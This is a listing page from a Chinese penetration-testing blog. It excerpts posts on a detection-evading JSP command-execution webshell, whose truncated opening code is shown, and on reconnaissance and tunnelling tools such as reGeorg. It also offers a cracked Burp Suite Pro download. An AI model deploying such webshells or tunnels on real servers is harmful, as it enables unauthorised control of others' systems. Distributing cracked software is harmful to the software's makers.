热门 国外jsp cmd小马能绕过拦截等内容检测

时间:2016-12-28   作者:webbaozi   分类: 资源分享   热度:3918°    
时间:2016-12-28   分类: 资源分享    热度:3918  
<%@ page import="java.util.*,java.io.*"%> <% // // JSP_KIT // // cmd.jsp = Command Execution (unix) // // by: Unknown // modified: 27/06/2003 // %> <HTML><BODY> <FORM METHOD="GET" NAME="myform" ACTION=""> <INPUT TYPE="text" NAME="cmd"> <INPUT TYPE...

阅读全文>>

热门 K8_C段旁注查询工具5.0 30款国外主流CMS识别+智能识别未知CMS

时间:2016-12-16   作者:webbaozi   分类: 安全工具   热度:2223°    
时间:2016-12-16   分类: 安全工具    热度:2223  
K8_C段旁注查询工具V5.0 20161214 作者:K8拉登哥哥 唯一QQ:396890445 平台: Windows + .NET Framework 4.0 简介: K8_C段 提供4种方式查询子域名 必应(API & 搜索) + Google证书域名 支持获取主机名/探测操作系统/查询子域名/邮箱帐号/证书绑定域名等 筛选功能可自定义关键字或指定筛选,助安全人员快速找询易下手目标. C段方式1: 需要Key,C段最全,准确度最高.(比同类工具查询更准的原因) C段方式2: 不需要Key,速度最快.缺点:结果没API全,必应抽风时无法查询 渗透大站 方式1...

阅读全文>>

热门 改造reGeorg之突破限制

时间:2016-12-13   作者:webbaozi   分类: 安全工具   热度:2704°    
时间:2016-12-13   分类: 安全工具    热度:2704  
reGeorg不用多介绍了,内网渗透中常用工具之一。 https://github.com/sensepost/reGeorg 在做个目标的时候想用reGeorg做个socks5代理,但是出现了问题。记录下解决的过程。 在浏览器中访问会出现很熟悉的 Georg says, 'All seems fine',说明是正常的,如下图(为了目标的安全性,故把域名进行了替换): 但是在reGeorgSocksProxy客户端的时候却出现了异常,相信很多人在这就放弃了: 想想不应该呀,页面都能正常显示,那没办法了,把问题的原因锁定在reGeorg上,然后一步步调...

阅读全文>>

热门 Windows渗透测试利器Pentest Box

时间:2016-12-9   作者:webbaozi   分类: 安全工具   热度:1798°    
时间:2016-12-9   分类: 安全工具    热度:1798  
PentestBox是一款Windows平台下预配置的便携式开源渗透测试环境 为什么又有一个渗透测试环境? PentestBox不同于运行在虚拟机或者双启动环境的Linux渗透测试发行版。 它打包了所有的安全工具,并且可以在Windows系统中原生地运行,有效地降低了对虚拟机或者双启动环境的需求。 我们发现超过50%的渗透测试发行版是运行在Windows系统下的虚拟机程序中,这激发我们创造了它。 特性: 易于使用 Pentest Box和Linux有些相似,可以完全依靠命令行工具进行使用,...

阅读全文>>

热门 burpsuite_pro_v1.7.11破解版(含下载地址)

时间:2016-12-5   作者:webbaozi   分类: 安全工具   热度:1321°    
时间:2016-12-5   分类: 安全工具    热度:1321  
BurpSuite是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,包含了Proxy,Spider,Scanner,Intruder,Repeater,Sequencer,Decoder,Comparer等工具模块。通过拦截HTTP/HTTPS的web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是web安全人员的一把必备的瑞士军刀。 官方提供免费版和专业版,以下是两个版本的功能对比。 下载地址:burp suite 密码:6666

阅读全文>>

热门 子域名爆破神器subDomainsBrute 1.0.3下载

时间:2016-12-1   作者:webbaozi   分类: 安全工具   热度:1243°    
时间:2016-12-1   分类: 安全工具    热度:1243  
渗透测试时,前期的信息收集包括主机(服务)发现。 子域名暴力枚举是十分常用的主机查找手段。 我写了一个改进的小脚本,用于暴力枚举子域名,它的改进在于: 用小字典递归地发现三级域名,四级域名、五级域名等不容易被探测到的域名 字典较为全面,小字典就包括3万多条,大字典多达8万条 默认使用114DNS、百度DNS、阿里DNS这几个快速又可靠的公共DNS进行查询,可随时修改配置文件添加你认为可靠的DNS服务器 自动筛选泛解析的域名,当前规则是: 超过10个域名指向同一IP,则此后发现的其他指向该IP的域名将被丢弃 ...

阅读全文>>

热门 安全参考杂志汇总(共31期)下载

时间:2016-11-29   作者:webbaozi   分类: 安全文档   热度:1348°    
时间:2016-11-29   分类: 安全文档    热度:1348  
安全参考杂志是国内知名的web安全杂志,杂志内容丰富,汇集了包括渗透测试、XSS跨站、无线终端、权限提升、社会工程以及SQL注入等多方面的优秀文章,杂志目前与国内多个Web安全研究论坛达成合作关系,比如法克论坛,习科论坛等,并有N多大牛参与编写,是渗透测试人员必看的杂志之一,为了方便打包上传一份。 下载地址: 安全参考下载 密码: 酷8

阅读全文>>

返回顶部    首页    手机版本   
版权所有:baozi|学与用    站长: webbaozi  蜀ICP备16032848号-1